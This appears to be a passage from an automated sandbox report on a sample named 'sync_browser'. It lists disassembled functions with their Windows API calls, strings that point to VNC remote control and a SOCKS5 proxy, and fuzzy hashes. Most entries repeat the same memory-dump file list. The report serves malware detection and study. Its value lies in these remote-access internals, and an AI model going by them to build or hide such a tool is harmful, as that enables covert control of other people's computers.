Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterExceptionInitializeLeaveRaisemalloc
String ID: G
API String ID: 2834860089-985283518
Opcode ID: 163d903ced7c1d504fa84a9e51e7384b3b992433d33170fc57d78eaf579be50a
Instruction ID: c77051c8ad9896824bddca93bdbce16165b0c619cead3e607b23cd200948c245
Opcode Fuzzy Hash: 163d903ced7c1d504fa84a9e51e7384b3b992433d33170fc57d78eaf579be50a
Instruction Fuzzy Hash: 22315E3251CB81C6E711BF25E5443A8B3A4FF44BA4F840235DA9947BA8CFB8E495C721

Function 00007FF7400B99CC Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF7400B9923
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7400B992E
_errno.LIBCMT ref: 00007FF7400B9960
_errno.LIBCMT ref: 00007FF7400B9972

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno$_invalid_parameter_noinfo
String ID:
API String ID: 2819658684-0
Opcode ID: 859027ed417ea2719fff98fb652ef308f396c22346242a752418a20ea244bd4e
Instruction ID: 592d664e5a20d3aee3eebf3f7cc863f1e17ba986d0777db7c2e76118ebacf4b4
Opcode Fuzzy Hash: 859027ed417ea2719fff98fb652ef308f396c22346242a752418a20ea244bd4e
Instruction Fuzzy Hash: A0218421A1D643D5F7617BA5680137EE2B4AF45BC0F844435E98D47BAEDF2CF4009724

Function 00007FF74000A290 Relevance: 6.1, APIs: 4, Instructions: 57comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00007FF74000A2B8
CoCreateInstance.OLE32 ref: 00007FF74000A2E5
CoUninitialize.OLE32 ref: 00007FF74000A320

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID:
API String ID: 948891078-0
Opcode ID: 5481b7ab5fc5c7fceea0fc204020ee9c7aeb27894877d551f4c9081dc7f6ea27
Instruction ID: bb3f1af4474458d6f35197982228464c117d3f8ec3835771867af556a6945bc0
Opcode Fuzzy Hash: 5481b7ab5fc5c7fceea0fc204020ee9c7aeb27894877d551f4c9081dc7f6ea27
Instruction Fuzzy Hash: 4221013661CB41C2E710AB69F45466AB3A0FB89B54F905131E69E837A8DF7DE444CB20

Function 00007FF740083CA0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 00007FF740083CCE

Part of subcall function 00007FF7400B8C34: _FF_MSGBANNER.LIBCMT ref: 00007FF7400B8C64
Part of subcall function 00007FF7400B8C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF7400C329C,?,?,?,00007FF7400C7749,?,?,?,00007FF7400C77F3), ref: 00007FF7400B8C89
Part of subcall function 00007FF7400B8C34: _callnewh.LIBCMT ref: 00007FF7400B8CA2
Part of subcall function 00007FF7400B8C34: _errno.LIBCMT ref: 00007FF7400B8CAD
Part of subcall function 00007FF7400B8C34: _errno.LIBCMT ref: 00007FF7400B8CB8

free.LIBCMT ref: 00007FF740083CFA

Part of subcall function 00007FF7400B8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF7400B748C), ref: 00007FF7400B8C0A
Part of subcall function 00007FF7400B8BF4: _errno.LIBCMT ref: 00007FF7400B8C14
Part of subcall function 00007FF7400B8BF4: GetLastError.KERNEL32(?,?,?,00007FF7400B748C), ref: 00007FF7400B8C1C

free.LIBCMT ref: 00007FF740083D0E

Strings

Unable to allocate memory in zip library at %s, xrefs: 00007FF740083D18

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno$Heapfree$AllocErrorFreeLast_callnewhmalloc
String ID: Unable to allocate memory in zip library at %s
API String ID: 1063416079-1743894623
Opcode ID: ba376857e1607f634655ae19f1f2692845fd45ced7f8db6e81b9ee0e7955995e
Instruction ID: 9f747129a7ae0065a50e1ea80ec85fc5e8a56c61a5e8e5e07debd38100a3fa4b
Opcode Fuzzy Hash: ba376857e1607f634655ae19f1f2692845fd45ced7f8db6e81b9ee0e7955995e
Instruction Fuzzy Hash: 6811D32261DB82C5EA50FB55B44017AB760FB84B94F881135EF9D437AADF3CF4428B14

Function 00007FF7400979A0 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF7400979C7
LeaveCriticalSection.KERNEL32 ref: 00007FF7400979E9
CreateSemaphoreA.KERNEL32 ref: 00007FF740097A03
GetLastError.KERNEL32 ref: 00007FF740097A15

Part of subcall function 00007FF7400C2950: RaiseException.KERNEL32 ref: 00007FF7400C29CB

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$CreateEnterErrorExceptionLastLeaveRaiseSemaphore
String ID:
API String ID: 1747828912-0
Opcode ID: 14ac771c62f70bbc5ec8748b8740afadcc4c6e14281f3ec5920f493c53464439
Instruction ID: d7d0fd1cc429778a650e402f62421e77005bba6c3e99e95f4a939dae29b9f912
Opcode Fuzzy Hash: 14ac771c62f70bbc5ec8748b8740afadcc4c6e14281f3ec5920f493c53464439
Instruction Fuzzy Hash: 6F115C72A28B51D7E704AF25F584159B7A4FB48B90F90413AEB5943B64CF38F471CB50

Function 00007FF7400292C0 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF7400292F0

Part of subcall function 00007FF740097520: EnterCriticalSection.KERNEL32 ref: 00007FF740097534
Part of subcall function 00007FF740097520: ReleaseSemaphore.KERNEL32 ref: 00007FF740097577
Part of subcall function 00007FF740097520: GetLastError.KERNEL32 ref: 00007FF740097581
Part of subcall function 00007FF740097520: LeaveCriticalSection.KERNEL32 ref: 00007FF74009758C

Part of subcall function 00007FF740097400: EnterCriticalSection.KERNEL32 ref: 00007FF740097427
Part of subcall function 00007FF740097400: LeaveCriticalSection.KERNEL32 ref: 00007FF740097472
Part of subcall function 00007FF740097400: LeaveCriticalSection.KERNEL32 ref: 00007FF74009747B
Part of subcall function 00007FF740097400: WaitForSingleObject.KERNEL32 ref: 00007FF74009748A
Part of subcall function 00007FF740097400: EnterCriticalSection.KERNEL32 ref: 00007FF740097495
Part of subcall function 00007FF740097400: GetLastError.KERNEL32 ref: 00007FF7400974A7
Part of subcall function 00007FF740097400: EnterCriticalSection.KERNEL32 ref: 00007FF7400974DE
Part of subcall function 00007FF740097400: LeaveCriticalSection.KERNEL32 ref: 00007FF740097500

Strings

vncclient.cpp : disable update thread, xrefs: 00007FF740029321
b, xrefs: 00007FF7400292E5
vncclient.cpp : enable/disable synced, xrefs: 00007FF74002935C

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$Enter$Leave$ErrorLast$ObjectReleaseSemaphoreSingleWait
String ID: b$vncclient.cpp : disable update thread$vncclient.cpp : enable/disable synced
API String ID: 1962697109-2518527632
Opcode ID: f543da9bb464de5584b1e5b02f7bc905784e8395ad55e1ed3b6c4c6bb991fdcf
Instruction ID: a35f3745e5e3b684ec6097df0e27a9ffbe90879a13d88a31c656b98b222ee8d7
Opcode Fuzzy Hash: f543da9bb464de5584b1e5b02f7bc905784e8395ad55e1ed3b6c4c6bb991fdcf
Instruction Fuzzy Hash: DF113D72A1CA82C2EB04BF25E4506E9A361FB84BA4F884235DA5D473F9DF78E504C720

Function 00007FF740017960 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF740017978
SetEvent.KERNEL32 ref: 00007FF74001798E
LeaveCriticalSection.KERNEL32 ref: 00007FF740017A08
DeleteCriticalSection.KERNEL32 ref: 00007FF740017A1E

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$DeleteEnterEventLeave
String ID:
API String ID: 3772564070-0
Opcode ID: 678031ac42c66a5cc385a0b69a6c3c5d1fab056847b98d7cff6dccc56ed1addc
Instruction ID: c3d42b0512295a3651866cf98ac16d4326bc08d5d9aa1ad858744b2343a339b0
Opcode Fuzzy Hash: 678031ac42c66a5cc385a0b69a6c3c5d1fab056847b98d7cff6dccc56ed1addc
Instruction Fuzzy Hash: 2221C92591DA46C1FB18BB55F894778A360AF88B84FC40032C90E477B5DF3DB589C722

Function 00007FF740097520 Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF740097534
ReleaseSemaphore.KERNEL32 ref: 00007FF740097577
GetLastError.KERNEL32 ref: 00007FF740097581
LeaveCriticalSection.KERNEL32 ref: 00007FF74009758C

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterErrorLastLeaveReleaseSemaphore
String ID:
API String ID: 540623443-0
Opcode ID: 1ef8894c349e896affc9970763aea91ebceedb24d96a9e68f30ae080b1782f5f
Instruction ID: 32ef1e92d1d9252a6c4abfe6e99fb515e14c85c249cfcf4b08d611cfe5c325f3
Opcode Fuzzy Hash: 1ef8894c349e896affc9970763aea91ebceedb24d96a9e68f30ae080b1782f5f
Instruction Fuzzy Hash: 30113C32A2CA46C6DB85FF61E4506A8A3A4FF48B84F905131DA4E46728DF7CE055C720

Function 00007FF740019570 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF74001957C
ExtEscape.GDI32 ref: 00007FF74001959E
ExtEscape.GDI32 ref: 00007FF7400195BB
ReleaseDC.USER32 ref: 00007FF7400195C6

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Escape$Release
String ID:
API String ID: 2350829361-0
Opcode ID: c485e33178795d9909b89da61998c10babd3cfe1ac8502836bf93b7e6d891906
Instruction ID: 8149ba80a5d4cc05a2f1f482f3c80167eb0be14e63638e34200df9d2738baed8
Opcode Fuzzy Hash: c485e33178795d9909b89da61998c10babd3cfe1ac8502836bf93b7e6d891906
Instruction Fuzzy Hash: 5BF06D3661864283E720AB20B955A2AB2A1FB88784F945135DE5A02F28CE3CE0118B14

Function 00007FF74000BCB0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 00007FF74000BE11
recv.WS2_32 ref: 00007FF74000BE51

Strings

Enter SOCKS5 password for %s@%s: , xrefs: 00007FF74000BCF7

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: recvsend
String ID: Enter SOCKS5 password for %s@%s:
API String ID: 740075404-2439350543
Opcode ID: a17d5de74fc3eb428b78c132b62d7971fded7c0904e229c4df4fc2bd377388f3
Instruction ID: 3a900d9838d1cdf1a7b253c693eb5d42479308f4fdea3138675b053b35514bde
Opcode Fuzzy Hash: a17d5de74fc3eb428b78c132b62d7971fded7c0904e229c4df4fc2bd377388f3
Instruction Fuzzy Hash: 6351A26260CAC1C4E760AB29A4403B9AA91FB457A8F945335EFBD43BE9DE3CE5058710

Function 00007FF7400C4AFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF7400C4B3D
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7400C4B48

Strings

SecureVNC;0;0x%08x;%s, xrefs: 00007FF7400C4B0B

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID: SecureVNC;0;0x%08x;%s
API String ID: 2959964966-2465057312
Opcode ID: dd74be20851cb3f41d9180301c7e16b100e5b1f099809bd476a84f22288f1907
Instruction ID: ea9cf58f9fa061ddd821104e9879147f59622545a3150dce1814922a5d3251ec
Opcode Fuzzy Hash: dd74be20851cb3f41d9180301c7e16b100e5b1f099809bd476a84f22288f1907
Instruction Fuzzy Hash: 58218132B1C712C9E719FF61A8405ADB6A5BB087A8B980136EE5C53B9CCF38E801C350

Function 00007FF7400B89E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF7400B8969
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7400B8974

Strings

B, xrefs: 00007FF7400B8999

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID: B
API String ID: 2959964966-1255198513
Opcode ID: 779c603700780fbf2f45e9157354add3ac742e15963c7acc544eaab7f6780786
Instruction ID: 9cd6ec24a46cde05727221b9ff9728ba61ccec3d9b78c7b2d377cbb999b207a2
Opcode Fuzzy Hash: 779c603700780fbf2f45e9157354add3ac742e15963c7acc544eaab7f6780786
Instruction Fuzzy Hash: 85112E3261C741C6EB24BB55A44027DB6A0FB88B94F984231EF9D07BA9CF3CE540CB15

Function 00007FF7400141E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00007FF740014212

Part of subcall function 00007FF7400B7DE8: _errno.LIBCMT ref: 00007FF7400B7E00
Part of subcall function 00007FF7400B7DE8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7400B7E0C

SendDlgItemMessageA.USER32 ref: 00007FF740014274

Strings

<, xrefs: 00007FF74001423A

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Item$MessageSend_errno_invalid_parameter_noinfo
String ID: <
API String ID: 2439412506-4251816714
Opcode ID: e51f02eda6ff0a6bcec5b6e3f2d368480529d1570d9d4b28ab8a1b662bfae53e
Instruction ID: 7694948d2e6c2010ff9c9b279233f2acf990acbcfc8746dd58873b7721b8802d
Opcode Fuzzy Hash: e51f02eda6ff0a6bcec5b6e3f2d368480529d1570d9d4b28ab8a1b662bfae53e
Instruction Fuzzy Hash: 96114F7261C641C6EB50AF16F4107AAB360FB88B48F945031EB8D07B69CF3DE946CB50

Function 00007FF7400B8B14 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF7400B8B4D
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7400B8B58

Strings

I, xrefs: 00007FF7400B8B8D

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
